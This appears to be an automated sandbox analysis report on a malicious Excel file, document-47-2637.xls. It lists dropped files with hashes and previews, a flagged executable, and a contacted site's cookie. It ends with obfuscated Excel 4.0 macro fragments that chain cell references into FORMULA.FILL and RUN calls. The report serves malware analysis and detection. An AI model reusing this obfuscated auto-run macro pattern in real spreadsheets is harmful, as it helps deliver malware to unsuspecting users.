          SHA-512:DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wg*X......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..||[.w.M.!<-.}%.C<tDX5\s._..I..*..nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1|.._F.
          C:\Users\user\AppData\Local\Temp\F6DE0000
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):68561
          Entropy (8bit):7.608770850697448
          Encrypted:false
          SSDEEP:1536:m+yXkNLPHqvAk/Vi6+YDT7Hbc8hxCCV25Z:m+yUNLP4lA6+YHcId25Z
          MD5:B67C936515D2A419269AB8E2D93204DE
          SHA1:44331DB15B55BAD0D97DEFE091ACF39EE39248A3
          SHA-256:E933C429EFC848987756125BFE9C3AB422F5E2EFCAEF5F945718AC31F90C9658
          SHA-512:6B3D48B0153F8AC2D2AC7A4FB9462E145321D13AFD8C9284A94837DC5108FD55998CA902B7FD8EC83A8549F5A0B3B8CA4C7B951818AE04B03CF578BC3F5DA210
          Malicious:false
          Reputation:low
          Preview: .TKo.0.....0t-l.=.....>.].u?...X.^..6....4k. ^.^l... %rz.r.y.D&.^.w..WA........h(..`..^........:"5...!..CJR.:..D..... .gZ..j......7....s....M.q.O677+..q.'.B4W..E........1.-.a Fk.d.N>{.....Y..`"..uqX.D.z+....r&........u...%..c...8Iq..B...;.*.....9..:<.T.$...?$..Y..s.P.....:..AW2g..I]....O5....zD&.CY.....R^[.O..tLy...WN..n.-.....X.....%:...>.H<>..^..^/.62..lp..zi..]~..^.a.n...mY.../.......PK..........!...<............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C...nH....
          C:\Users\user\AppData\Local\Temp\TarE005.tmp
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):156885
          Entropy (8bit):6.30972017530066
          Encrypted:false
          SSDEEP:1536:NlR6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMuGmO:N2UJcCyZfdmoku2SL3kMnBGuzO
          MD5:9BE376D85B319264740EF583F548B72A
          SHA1:6C6416CBC51AAC89A21A529695A8FCD3AD5E6B85
          SHA-256:07FDF8BC502E6BB4CF6AE214694F45C54A53228FC2002B2F17C9A2EF64EB76F6
          SHA-512:8AFC5D0D046E8B410EC1D29E2E16FB00CD92F8822D678AA0EE2A57098E05F2A0E165858347F035AE593B62BF195802CB6F9A5F92670041E1828669987CEEC7DE
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: 0..d...*.H.........d.0..d....1.0...`.H.e......0..T...+.....7.....T.0..T.0...+.....7........L.E*u...210519191503Z0...+......0..T.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jun 11 06:00:40 2021, atime=Fri Jun 11 06:00:40 2021, length=8192, window=hide
          Category:dropped
          Size (bytes):867
          Entropy (8bit):4.480521840960962
          Encrypted:false
          SSDEEP:12:85Q8LoLgXg/XAlCPCHaXtB8XzB/04uX+Wnicvb63+bDtZ3YilMMEpxRljKtTdJP8:85I/XTd6jJuYe4SDv3qArNru/
          MD5:D1901B672D68B95B87925635D8835BDF
          SHA1:3B0CAF79347B90E7F276CB084D1074E24599E8A2
          SHA-256:DB6552B4D3F6608CE90336C480BEC6C4E963B8815E377D16E895B186F040AA34
          SHA-512:83D9FFBF227CCBF7539E2DBFD061F446FD7107CDB06FF3967499214442C0EF4E1B23E50B481E85991ECFE0E794C73A8A4CF6DD71359C7B75BAEF747455BA0331
          Malicious:false
          Reputation:low
          Preview: L..................F...........7G...z=}.^...z=}.^... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.8..Desktop.d......QK.X.R.8*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\067773\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......067773..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-47-2637.LNK
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Fri Jun 11 06:00:40 2021, atime=Fri Jun 11 06:00:40 2021, length=92672, window=hide
          Category:dropped
          Size (bytes):2088
          Entropy (8bit):4.536758685214297
          Encrypted:false
          SSDEEP:24:8i/XTd6jFyq4Me431Dv3qAdM7dD2i/XTd6jFyq4Me431Dv3qAdM7dV:8i/XT0jFB4MdEAQh2i/XT0jFB4MdEAQ/
          MD5:709594534DD8AAF9078F756A8817A71A
          SHA1:1FAF88E21AE6ED12EAE26EB687EEC62C97B6D7F2
          SHA-256:C411BE565BE4A1C8D52CB9FD1510C1CC565F34BCAE4385966579D84C325C74D1
          SHA-512:DF93EE96B3EC505691231141EBEF51DB12E8DB0CBC416584E27A8A4C4D9F31E181CC095F27FD21DB1CF709B0C8350CDB0867F3E9308DD3359890EF03010C8CB1
          Malicious:false
          Preview: L..................F.... ....}..{...z=}.^..E.G}.^...j...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..h...R.8 .DOCUME~1.XLS..V.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.......~...............-...8...[............?J......C:\Users\..#...................\\067773\Users.user\Desktop\document-47-2637.xls.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......067773..........D_....3N...W...9F.C....
          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):101
          Entropy (8bit):4.781102818999889
          Encrypted:false
          SSDEEP:3:oyBVomMY9LRkKSd6YCZELRkKSd6YCmMY9LRkKSd6YCv:dj6Y9LaJdzgELaJdzUY9LaJdzs
          MD5:CC574425794FB97F59C2DC249939493A
          SHA1:8CA2DFD4C2535E0FFEB160319D2CD079758B7F8D
          SHA-256:1D977854F9C0DDF7462B6991CA2B6026C4FFCAF52F158A2C7B81B8FBEE5E35F0
          SHA-512:6C9C7CAFA742354DB174653D4C1CF9521AC10C67177FB2E26A85AE1267F1A45094BD1F1AE3C0B53836D5210F6083906F17C26A28A197D0CCF2F76D7447272E43
          Malicious:false
          Preview: Desktop.LNK=0..[xls]..document-47-2637.LNK=0..document-47-2637.LNK=0..[xls]..document-47-2637.LNK=0..
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZH9NG0C7.txt
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:ASCII text
          Category:downloaded
          Size (bytes):99
          Entropy (8bit):4.738309873166655
          Encrypted:false
          SSDEEP:3:12mZI6A3xQlGTKvUQ2NwS2TdeX3Rsa/n:8YIr3xUGZXN2TwXzn
          MD5:1013A2F28CACF36A2234BC56C8B76B40
          SHA1:25B9130C97E0351F0707D53C72E4E1C700C324BE
          SHA-256:4B034D46F013E42559260BD248B7B0011EE83AE4D836D14FB4083A3BE287C3D2
          SHA-512:F28E38E260D8F9B5ADC14C6F449299D6318268412C2BDC9616E46CD9C22AF6DD5546F4684F549EF2FA8B1AD00400370AD2C84BD9ED4DC6704427B7D4EC7ADE73
          Malicious:false
          IE Cache URL:webhub365.com/
          Preview: PHPSESSID.hodlph97qarho6n2q5ae7qthj6.webhub365.com/.1536.1170067456.30891789.2127077170.30891663.*.
          C:\Users\user\Desktop\774F0000
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Applesoft BASIC program data, first line number 16
          Category:modified
          Size (bytes):99731
          Entropy (8bit):7.932017898229176
          Encrypted:false
          SSDEEP:3072:VKZ1QaE1iFKbbG46fQWnPdkuiZpKZ1SaE1/:VKZW9ocW46fjF8ZpKZ49l
          MD5:1C3608A1D6C608CAAB12624DE264B8DC
          SHA1:A83808D92C7633E5123DA9A49FA5F01F9836A256
          SHA-256:9ACD9A818075B4FA763A7B0328DB449DA693309C6EBE330B8C81F14BE566CD91
          SHA-512:4A407DA6AA2A6896391D8C967E18A516B01046D96E7A167A7EDBE4A0FBBCBC73407A72B82137452674142CDE33802B46E1081C0C5C769306736E8A9AAAADE46F
          Malicious:false
          Preview: ........g2........../.........X.:...5.IE..1`.3>...."n.^...}.6...Q.nKJD4.]..$.8........g2........../.6.......X.:...5.IE..1`.3>...."n.^...}.6...Q.nKJD4.]..$.8..........*U....\.p.p.h`.q._.C.%5R."h.sHV-....1......K.. ..<...7].1..s.Ye....bsn.....!..g.<.......$N*'.~..apH.z*\..A{./.97ViB....7a.........=............y.....@.....................a=....i..,....TC.....R@....'.....7"...z...................1.....d._..u.Db.R..h...o.1a9i.k..1...u.......@..O...B...$..3....1...).@q../Y.1...,...........u..1.....7.D.]...{...-.IGFB...e....1....L...C.D..:.i..$..f.:..U..1.*.P.'8 ..S.mX.S..XU...<'\e...Kl.>.j.q.p.0.1...........R._<@..s}..aw l.....1...l....S.[B...).....1 w.W.`.1.1.....r."aiE?D.Z..0i.}...V..C5.-.1......c.=>J.z....:.m.}.arH..!.1...[.....aB.F|S.....;."....W;b.1....=x......T.K...3,.PP..H..s..Y-1...i.%......w..o}.-....-..lj..5..1.......F3.. 4.....;...2;...x.s^.1...o......@.I.icN.{..M.".!b...1....P.r.r.'.G.H.......n...h...(6.1....=..V.2..........4.....iy..:F.1...
          C:\Users\user\Desktop\C7DE0000
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Applesoft BASIC program data, first line number 16
          Category:dropped
          Size (bytes):117436
          Entropy (8bit):7.9268262065554325
          Encrypted:false
          SSDEEP:3072:M2hpEu0A4iQEmRqwJOu3J5Pn/cOGWJPn/cZGW02hpEA0w:V0tA4idvu3JRFBoN0/w
          MD5:388CD90E27FA7C09A02E5490E32F9408
          SHA1:0E61310B0D55D8C1E24DCBBC9CAA79874959E308
          SHA-256:EDA8CD37F5999158DCABBD39B4292FE7692163FBCEEB68AE1BDE1166D350564B
          SHA-512:6DA5A552A3ED2229C478AAE92AAAF5436B8F6D9C2DABFD580389DA3243B486C4B7EED5748C753D57123EF474455A77EA64373AC94EE2AEE24B5D872A6268BFAC
          Malicious:false
          Preview: ........g2........../..........._`........G4.'.3P_....P...@.......*]L..V.1........g2........../.6........._`........G4.'.3P_....P...@.......*]L..V.1...........T....\.p.S.T..~.\|.`..C.0.J....hN~..\x9:..;i..~.{.Ik.1...Z.\Q......!JG..HB....}.Mu...........i.>It.W........"T.......[A.B....xa....!....=...e\............^%..........:..........2m=.....Y..) .\.q.V...j.@....>....."...*.....v3....ly......1...2....%i...J..F.:y.z....B...X.1......Bzme....Db.mD..i......D..1.......Wi^..r..B........h..Bp1...]*...gF.>. .....:9.I:U...\.1....u...c.....L......-.......b1.*.._l..|..o....7..`y....e_.*:*..i..<o.>|1...S....~....7".5A&.I.$..p..v...1.....A0.....>.Vs.....3.z2...9.L1......q.Q...=...Bz....N.$..g.Wl.1......Km.9......f..n.Q..}.&?)61.....E_..8E.-..4m).A)..H....O%1.....r...zA.s.....Nd..}.mj....q1...<.R.*..{.#...%....\Cc...?....1...e....C..O_....M.Ybz..>.SIX51......n[....$...!....z\{D>?Hx...1......ow.;xg'M......y].L.|..3.1...Mp.BX."K.p.c.?.ojj..T.v|}?f..1...
          C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
          Process:C:\Windows\System32\cmd.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):25600
          Entropy (8bit):5.584698658834256
          Encrypted:false
          SSDEEP:384:zKIhxI3PKZ/COyNcx5GTyoNr9MUVO9FvB3RH++x5XrIQP8S8cB5vWMiG:zKIhxI3PKZ/bIaqyCrXV+v1NrnLB5X
          MD5:7F7F391491C315A4A72EFCAC0D34FA93
          SHA1:20A18C7EA14F4E1D3044091B46D6E862B6F38708
          SHA-256:022577F47FB074B7D942C8F01DAAC778B110A373DE03B3B5043E887995B09D52
          SHA-512:78D39D7FD02D4F6CA0E13D0EACADC842D5A104C31342202875F84A69C310ECF6D4DCC8F00E95B09DE936922BE0312CF956C5E955254A99113EFB3F51E26C082E
          Malicious:true
          Antivirus:
          • Antivirus: Virustotal, Detection: 0%, Browse
          • Antivirus: Metadefender, Detection: 2%, Browse
          • Antivirus: ReversingLabs, Detection: 0%
          Joe Sandbox View:
          • Filename: document-47-2637.xls, Detection: malicious, Browse
          • Filename: document-37-1849.xls, Detection: malicious, Browse
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.].*.3.*.3.*.3..)..+.3..)..).3..)..>.3..)..%.3.*.2.V.3..)..9.3..)..+.3..)..+.3.Rich*.3.........PE..L...-.[R.................B...$.......J.......`....@.................................k.....@...... ..........................$q......................................0...............................h!..@............p..$............................text...|A.......B.................. ..`.data........`.......F..............@....idata..6....p.......H..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B........................................................................................................................................................................................................................................................................................................................................

          Static File Info

          General

          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Windows User, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jun 2 14:40:34 2021, Last Saved Time/Date: Wed Jun 2 14:40:36 2021, Security: 1
          Entropy (8bit):7.59086745125602
          TrID:
          • Microsoft Excel sheet (30009/1) 78.94%
          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
          File name:document-47-2637.xls
          File size:92165
          MD5:92dcc47a1a044fc3a2328ec6eef3918b
          SHA1:6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
          SHA256:ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988
          SHA512:fcd4b7c0a4e0f785604f40e0a9a4690e9b642223ee63088c6c4acfc262a18f5a79c77ab82498b422b229eaecc9a2e745b7e455c43ad2a85794e7adbac6b9bafd
          SSDEEP:1536:Lc2ZSmXWCQnp2c90Hg+j8z3kVfKIDVzoFGUslIB54N+wl8MYBzaVt4J5aukGqu:LXZxXTQ8hHgNQNeF3V4NvuhBzaV+J5a+
          File Content Preview:........................>......................................................................................................................................................................................................................................

          File Icon

          Icon Hash:e4eea286a4b4bcb4

          Static OLE Info

          General

          Document Type:OLE
          Number of OLE Files:1

          OLE File "document-47-2637.xls"

          Indicators

          Has Summary Info:True
          Application Name:Microsoft Excel
          Encrypted Document:True
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:True
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:
          Flash Objects Count:
          Contains VBA Macros:False

          Summary

          Code Page:1252
          Author:Windows User
          Last Saved By:Windows User
          Create Time:2021-06-02 13:40:34
          Last Saved Time:2021-06-02 13:40:36
          Creating Application:Microsoft Excel
          Security:1

          Document Summary

          Document Code Page:1252
          Thumbnail Scaling Desired:False
          Company:
          Contains Dirty Links:False
          Shared Document:False
          Changed Hyperlinks:False
          Application Version:983040

          Streams

          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
          General
          Stream Path:\x5DocumentSummaryInformation
          File Type:data
          Stream Size:4096
          Entropy:0.308022095077
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . i . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a5 00 00 00
          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
          General
          Stream Path:\x5SummaryInformation
          File Type:data
          Stream Size:4096
          Entropy:0.316312415339
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . W . . @ . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00
          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81910
          General
          Stream Path:Workbook
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:81910
          Entropy:7.97723236264
          Base64 Encoded:True
          Data ASCII:. . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . j . . . _ . W > N . B . . [ . . . . . . D . G . . . . 9 s < D l . o . b . 3 . ^ K W . ~ . U . . . . . . . . . . . h . . . . . \\ . p . i . . v . / . . . . B . 7 r . n . S . $ . 4 f . 7 . U . . e . Y k . . . L Q . . o N . . . . $ a . 7 Q . . . u . s . X U . ^ . . . . . . K . C d . . . l . ? . & . C . . . . . . . . v . . . . . 4 ; / . . . . 6 4 = . . . . . . B . . . . I a . . . . D . . . . = . . . . # . c . . . . h . . . . . s R . . . . . . . . . .
          Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 2f 00 36 00 01 00 01 00 01 00 02 6a df 82 8f 5f f7 57 3e 4e 18 42 a0 92 5b 1d e8 95 bd ea b2 44 89 47 13 ad c8 06 39 73 3c 44 6c 0c 6f cd 62 dc 33 7f 5e 4b 57 2e 7e e6 55 cf e1 00 02 00 b0 04 c1 00 02 00 68 a6 e2 00 00 00 5c 00 70 00 69 b6 c9 76 af 2f 14 b1 ed d6 42 f4 37 72 10 6e cc 53 fc 24 ef 34 66 18 37 82 55 80 f5 65

          Macro 4.0 Code

          ,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,x,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $N$84&$X$102&$K$324&$C$460&$M$83&$K$324&$N$447&$I$336&$X$102&$K$324&$X$82&$M$83&$U$271&$X$102&$V$246&$X$462,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $W$367,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($K$351),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $H$409&$H$409&$N$84&$N$84&$N$84&$N$84&$H$409,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $Y$71,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($I$385),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\,,,,,,,,,,,,,,,,,,,,,,,Z,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,,,,,,,,,t,,,,,,,,,,,,,,,,,,,,,,,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RETURN(FORMULA.FILL(mxUXwaSU,id9nB5my))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,q,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, 